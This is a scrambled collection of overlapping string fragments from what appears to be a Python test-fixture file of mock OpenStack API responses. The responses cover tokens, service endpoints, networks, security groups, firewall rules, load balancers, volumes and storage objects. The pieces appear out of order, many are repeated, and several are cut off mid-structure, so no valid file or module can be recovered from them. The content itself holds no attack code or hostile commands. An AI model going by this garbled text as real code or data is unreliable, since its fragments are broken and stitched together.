"\"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\":",
"\"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\":",
"None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\",",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z',",
"\"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\":",
"'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles':",
"NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True,",
"{ \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS",
"'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network'",
"\"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [",
"[], 'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL':",
"\"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"\"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\":",
"'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type':",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [",
"'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS =",
"u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten',",
"'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service',",
"\"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\",",
"{ \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\":",
"'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS",
"[\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent",
"\"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = {",
"} FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True,",
"1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\":",
"\"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = {",
"\"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\":",
"this file except in compliance with the License. You may obtain # a",
"{ \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None,",
"[ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ]",
"\"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\",",
"PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\":",
"or implied. See the # License for the specific language governing permissions and",
"\"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\":",
"'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region':",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID },",
"None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count':",
"LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\":",
"FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\":",
"\"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\":",
"u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64',",
"\"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\":",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID },",
"\"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\":",
"\"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" },",
"\"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\"",
"} } ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\":",
"\"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\":",
"} SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\",",
"\"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [ {",
"\"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\":",
"policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\":",
"\"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST =",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None,",
"None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0],",
"'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id':",
"'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696'",
"\"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ]",
"= { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST =",
"None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, {",
"}, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\":",
"None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\",",
"\"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\":",
"{u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id':",
"{\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\":",
"{ \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\":",
"\"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member",
"True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1]",
"\"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\":",
"] } IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\":",
"Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name':",
"from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL':",
"= [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON",
"\"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\":",
"], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports']",
"{ 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] }",
"\"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS =",
"u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST =",
"u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' %",
"u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type':",
"\"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\":",
"\"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" },",
"None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, {",
"\"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }]",
"u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'},",
"1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST =",
"\"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ {",
"\"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] #",
"\"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\":",
"} ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall",
"\"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 }",
"'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type':",
"'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT,",
"1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST",
"\"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\":",
"AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL,",
"u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] },",
"[\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS",
"\"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\"",
"0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ]",
"} METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\",",
"'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL':",
"SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS =",
"\"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] }",
"\"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\",",
"} FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\",",
"\"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\":",
"© 2014 Cloudwatt # # Licensed under the Apache License, Version 2.0 (the",
"\"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\":",
"'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage",
"\"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\":",
"\"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST =",
"STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\":",
"\"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\":",
"\"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\",",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\",",
"} IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\",",
"test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\",",
"\"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone':",
"\"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824,",
"\"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": {",
"[], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL':",
"\"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\":",
"\"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True,",
"\"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\"",
"{u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href':",
"\"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\",",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"\"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\":",
"\"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\",",
"[ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\",",
"\"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ {",
"is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF",
"= [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1,",
"}, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [",
"u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name':",
"\"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\":",
"\"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\",",
"}, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\":",
"implied. See the # License for the specific language governing permissions and limitations",
